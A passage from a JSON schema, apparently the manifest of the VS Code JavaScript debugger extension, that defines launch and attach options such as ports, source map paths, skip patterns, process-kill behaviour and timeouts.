browser.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":false,"markdownDescription":"Whether to reconnect if the browser connection is closed","type":"boolean"},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this attribute.","tags":["setup"],"type":"string"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":true,"description":"Try to reconnect to the program if we lose connection. If set to `true`, we'll try once a second, forever. You can customize the interval and maximum number of attempts by specifying the `delay` and `maxAttempts` in an object instead.","oneOf":[{"type":"boolean"},{"properties":{"delay":{"default":1000,"minimum":0,"type":"number"},"maxAttempts":{"default":10,"minimum":0,"type":"number"}},"type":"object"}]},"runtimeArgs":{"default":[],"description":"Optional arguments passed to the runtime executable.","items":{"type":"string"},"tags":["setup"],"type":"array"},"runtimeExecutable":{"default":"node","markdownDescription":"Runtime to use. Either an absolute path or the name of a runtime available on the PATH. If omitted `node` is assumed.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"runtimeVersion":{"default":"default","markdownDescription":"Version of `node` runtime to use. Requires `nvm`.","type":"string"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"stopOnEntry":{"default":true,"description":"Automatically stop program after launch.","type":["boolean","string"]},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"},{"additionalProperties":false,"default":{"program":"npm start"},"description":"JavaScript Debug Terminal","properties":{"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"command":{"default":"npm start","description":"Command to run in the launched terminal. If not provided, the terminal will open without launching a program.","tags":["setup"],"type":["string","null"]},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","docDefault":"localRoot || ${workspaceFolder}","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"remoteRoot":{"default":null,"description":"Absolute path to the remote directory containing the program.","type":["string","null"]},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"type":"object"}]},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"targetSelection":{"default":"automatic","enum":["pick","automatic"],"markdownDescription":"Whether to attach to all targets that match the URL filter (\"automatic\") or ask to pick one (\"pick\").","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]},"url":{"default":"http://localhost:8080","description":"Will search for a tab with this exact url and attach to it, if found","tags":["setup"],"type":"string"},"urlFilter":{"default":"","description":"Will search for a page with this url and attach to it, if found. Can have * wildcards.","type":"string"},"vueComponentPaths":{"default":["${workspaceFolder}/**/*.vue"],"description":"A list of file glob patterns to find `*.vue` components. By default, searches the entire workspace. This needs to be specified due to extra lookups that Vue's sourcemaps require in Vue CLI 4. You can disable this special handling by setting this to an empty array.","type":"array"},"webRoot":{"default":"${workspaceFolder}","description":"This specifies the workspace absolute path to the webserver root. Used to resolve paths like `/app.js` to files on disk. Shorthand for a pathMapping for \"/\"","tags":["setup"],"type":"string"}},"type":"object"},"resolveSourceMapLocations":{"default":["${workspaceFolder}/**","!**/node_modules/**"],"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"runtimeExecutable":{"default":"node","markdownDescription":"Absolute path to VS Code.","type":["string","null"]},"runtimeSourcemapPausePatterns":{"default":[],"items":{"type":"string"},"markdownDescription":"A list of patterns at which to manually insert entrypoint breakpoints. This can be useful to give the debugger an opportunity to set breakpoints when using sourcemaps that don't exist or can't be detected before launch, such as [with the Serverless framework](https://github.com/microsoft/vscode-js-debug/issues/492).","type":"array"},"showAsyncStacks":{"default":true,"description":"Show the async calls that led to the current call stack.","oneOf":[{"type":"boolean"},{"properties":{"onAttach":{"default":32,"type":"number"}},"required":["onAttach"],"type":"object"},{"properties":{"onceBreakpointResolved":{"default":32,"type":"number"}},"required":["onceBreakpointResolved"],"type":"object"}]},"skipFiles":{"default":["${/**"],"description":"An array of file or folder names, or path globs, to skip when debugging. Star patterns and negations are allowed, for example, `[\"**/node_modules/**\", \"!**/node_modules/my-module/**\"]`","type":"array"},"smartStep":{"default":true,"description":"Automatically step through generated code that cannot be mapped back to the original source.","type":"boolean"},"sourceMapPathOverrides":{"default":{"meteor://💻app/*":"${workspaceFolder}/*","webpack:///./~/*":"${workspaceFolder}/node_modules/*","webpack://?:*/*":"${workspaceFolder}/*"},"description":"A set of mappings for rewriting the locations of source files from what the sourcemap says, to their locations on disk.","type":"object"},"sourceMapRenames":{"default":true,"description":"Whether to use the \"names\" mapping in sourcemaps. This requires requesting source content, which can be slow with certain debuggers.","type":"boolean"},"sourceMaps":{"default":true,"description":"Use JavaScript source maps (if they exist).","type":"boolean"},"testConfiguration":{"default":"${workspaceFolder}/.vscode-test.js","markdownDescription":"Path to a test configuration file for the [test CLI](https://code.visualstudio.com/api/working-with-extensions/testing-extension#quick-setup-the-test-cli).","type":"string"},"testConfigurationLabel":{"default":"","markdownDescription":"A single configuration to run from the file. If not specified, you may be asked to pick.","type":"string"},"timeout":{"default":10000,"description":"Retry for this number of milliseconds to connect to Node.js. Default is 10000 ms.","type":"number"},"timeouts":{"additionalProperties":false,"default":{},"description":"Timeouts for several debugger operations.","markdownDescription":"Timeouts for several debugger operations.","properties":{"hoverEvaluation":{"default":500,"description":"Time until value evaluation for hovered symbols is aborted. If set to 0, hover evaluation does never time out.","type":"number"},"sourceMapCumulativePause":{"default":1000,"description":"Extra time in milliseconds allowed per session to be spent waiting for source-maps to be processed, after the minimum time (sourceMapMinPause) has been exhausted","type":"number"},"sourceMapMinPause":{"default":1000,"description":"Minimum time in milliseconds spent waiting for each source-map to be processed when a script is being parsed","type":"number"}},"type":"object"},"trace":{"default":true,"description":"Configures what diagnostic output is produced.","oneOf":[{"description":"Trace may be set to 'true' to write diagnostic logs to the disk.","type":"boolean"},{"additionalProperties":false,"properties":{"logFile":{"description":"Configures where on disk logs are written.","type":["string","null"]},"stdio":{"description":"Whether to return trace data from the launched application or browser.","type":"boolean"}},"type":"object"}]}},"required":[]}},"configurationSnippets":[{"body":{"args":["^\"--extensionDevelopmentPath=\\${workspaceFolder}\""],"name":"Launch Extension","outFiles":["^\"\\${workspaceFolder}/out/**/*.js\""],"preLaunchTask":"npm","request":"launch","type":"extensionHost"},"description":"Launch a VS Code extension in debug mode","label":"VS Code Extension Development"}],"label":"VS Code Extension Development","strings":{"unverifiedBreakpoints":"Some of your breakpoints could not be set. If you're having an issue, you can [troubleshoot your launch configuration](command:extension.js-debug.createDiagnostics)."},"type":"extensionHost"},{"aiKey":"0c6ae279ed8443289764825290e4f9e2-1a736e7c-1324-4338-be46-fc2a58ae4d14-7255","configurationAttributes":{"attach":{"properties":{"address":{"default":"localhost","description":"IP address or hostname the debugged browser is listening on.","type":"string"},"browserAttachLocation":{"default":null,"description":"Forces the browser to attach in one location. In a remote workspace (through ssh or WSL, for example) this can be used to attach to a browser on the remote machine rather than locally.","oneOf":[{"type":"null"},{"enum":["ui","workspace"],"type":"string"}]},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"disableNetworkCache":{"default":true,"description":"Controls whether to skip the network cache for each request","type":"boolean"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"inspectUri":{"default":null,"description":"Format to use to rewrite the inspectUri: It's a template string that interpolates keys in `{curlyBraces}`. Available keys are:\n - `url.*` is the parsed address of the running application. For instance, `{url.port}`, `{url.hostname}`\n - `port` is the debug port that Chrome is listening on.\n - `browserInspectUri` is the inspector URI on the launched browser\n - `browserInspectUriPath` is the path part of the inspector URI on the launched browser (e.g.: \"/devtools/browser/e9ec0098-306e-472a-8133-5e42488929c2\").\n - `wsProtocol` is the hinted websocket protocol. This is set to `wss` if the original URL is `https`, or `ws` otherwise.\n","type":["string","null"]},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pathMapping":{"default":{},"description":"A mapping of URLs/paths to local folders, to resolve scripts in the Browser to scripts on disk","type":"object"},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"perScriptSourcemaps":{"default":"auto","description":"Whether scripts are loaded individually with unique sourcemaps containing the basename of the source file. This can be set to optimize sourcemap handling when dealing with lots of small scripts. If set to \"auto\", we'll detect known cases where this is appropriate.","enum":["yes","no","auto"],"type":"string"},"port":{"default":9229,"description":"Port to use to remote debugging the browser, given as `--remote-debugging-port` when launching the browser.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}],"tags":["setup"]},"resolveSourceMapLocations":{"default":null,"description":"A list of minimatch patterns for locations (folders and URLs) in which source maps can be used to resolve local files. This can be used to avoid incorrectly breaking in external source mapped code. Patterns can be prefixed with \"!\" to exclude them. May be set to an empty array or null to avoid restriction.","items":{"type":"string"},"type":["array","null"]},"restart":{"default":false,"markdownDescription":"Whether to reconnect if the browser connection is closed","type":"boolean"},"server":{"oneOf":[{"additionalProperties":false,"default":{"program":"node my-server.js"},"description":"Configures a web server to start up. Takes the same configuration as the 'node' launch task.","properties":{"args":{"default":[],"description":"Command line arguments passed to the program.\n\nCan be an array of strings or a single string. When the program is launched in a terminal, setting this property to a single string will result in the arguments not being escaped for the shell.","items":{"type":"string"},"tags":["setup"],"type":["array","string"]},"attachSimplePort":{"default":9229,"description":"If set, attaches to the process via the given port. This is generally no longer necessary for Node.js programs and loses the ability to debug child processes, but can be useful in more esoteric scenarios such as with Deno and Docker launches. If set to 0, a random port will be chosen and --inspect-brk added to the launch arguments automatically.","oneOf":[{"type":"integer"},{"pattern":"^\\${.*}$","type":"string"}]},"autoAttachChildProcesses":{"default":true,"description":"Attach debugger to new child processes automatically.","type":"boolean"},"cascadeTerminateToConfigurations":{"default":[],"description":"A list of debug sessions which, when this debug session is terminated, will also be stopped.","items":{"type":"string","uniqueItems":true},"type":"array"},"console":{"default":"internalConsole","description":"Where to launch the debug target.","enum":["internalConsole","integratedTerminal","externalTerminal"],"enumDescriptions":["VS Code Debug Console (which doesn't support to read input from a program)","VS Code's integrated terminal","External terminal that can be configured via user settings"],"type":"string"},"customDescriptionGenerator":{"description":"Customize the textual description the debugger shows for objects (local variables, etc...). Samples:\n 1. this.toString() // will call toString to print all objects\n 2. this.customDescription ? this.customDescription() : defaultValue // Use customDescription method if available, if not return defaultValue\n 3. function (def) { return this.customDescription ? this.customDescription() : def } // Use customDescription method if available, if not return defaultValue\n ","type":"string"},"customPropertiesGenerator":{"deprecated":true,"description":"Customize the properties shown for an object in the debugger (local variables, etc...). Samples:\n 1. { ...this, extraProperty: '12345' } // Add an extraProperty 12345 to all objects\n 2. this.customProperties ? this.customProperties() : this // Use customProperties method if available, if not use the properties in this (the default properties)\n 3. function () { return this.customProperties ? this.customProperties() : this } // Use customDescription method if available, if not return the default properties\n\n Deprecated: This is a temporary implementation of this feature until we have time to implement it in the way described here: https://github.com/microsoft/vscode/issues/102181","type":"string"},"cwd":{"default":"${workspaceFolder}","description":"Absolute path to the working directory of the program being debugged. If you've set localRoot then cwd will match that value otherwise it falls back to your workspaceFolder","tags":["setup"],"type":"string"},"enableContentValidation":{"default":true,"description":"Toggles whether we verify the contents of files on disk match the ones loaded in the runtime. This is useful in a variety of scenarios and required in some, but can cause issues if you have server-side transformation of scripts, for example.","type":"boolean"},"enableDWARF":{"default":true,"markdownDescription":"Toggles whether the debugger will try to read DWARF debug symbols from WebAssembly, which can be resource intensive. Requires the `ms-vscode.wasm-dwarf-debugging` extension to function.","type":"boolean"},"env":{"additionalProperties":{"type":["string","null"]},"default":{},"markdownDescription":"Environment variables passed to the program. The value `null` removes the variable from the environment.","tags":["setup"],"type":"object"},"envFile":{"default":"${workspaceFolder}/.env","description":"Absolute path to a file containing environment variable definitions.","type":"string"},"experimentalNetworking":{"default":"auto","description":"Enable experimental inspection in Node.js. When set to `auto` this is enabled for versions of Node.js that support it. It can be set to `on` or `off` to enable or disable it explicitly.","enum":["auto","on","off"],"type":"string"},"killBehavior":{"default":"forceful","enum":["forceful","polite","none"],"markdownDescription":"Configures how debug processes are killed when stopping the session. Can be:\n\n- forceful (default): forcefully tears down the process tree. Sends SIGKILL on posix, or `taskkill.exe /F` on Windows.\n- polite: gracefully tears down the process tree. It's possible that misbehaving processes continue to run after shutdown in this way. Sends SIGTERM on posix, or `taskkill.exe` with no `/F` (force) flag on Windows.\n- none: no termination will happen.","type":"string"},"localRoot":{"default":null,"description":"Path to the local directory containing the program.","type":["string","null"]},"nodeVersionHint":{"default":12,"description":"Allows you to explicitly specify the Node version that's running, which can be used to disable or enable certain behaviors in cases where the automatic version detection does not work.","minimum":8,"type":"number"},"outFiles":{"default":["${workspaceFolder}/**/*.(m|c|)js","!**/node_modules/**"],"description":"If source maps are enabled, these glob patterns specify the generated JavaScript files. If a pattern starts with `!` the files are excluded. If not specified, the generated code is expected in the same directory as its source.","items":{"type":"string"},"tags":["setup"],"type":["array"]},"outputCapture":{"default":"console","enum":["console","std"],"markdownDescription":"From where to capture output messages: the default debug API if set to `console`, or stdout/stderr streams if set to `std`."},"pauseForSourceMap":{"default":false,"markdownDescription":"Whether to wait for source maps to load for each incoming script. This has a performance overhead, and might be safely disabled when running off of disk, so long as `rootPath` is not disabled.","type":"boolean"},"profileStartup":{"default":true,"description":"If true, will start profiling as soon as the process launches","type":"boolean"},"program":{"default":"","description":"Absolute path to the program. Generated value is guessed by looking at package.json and opened files. Edit this 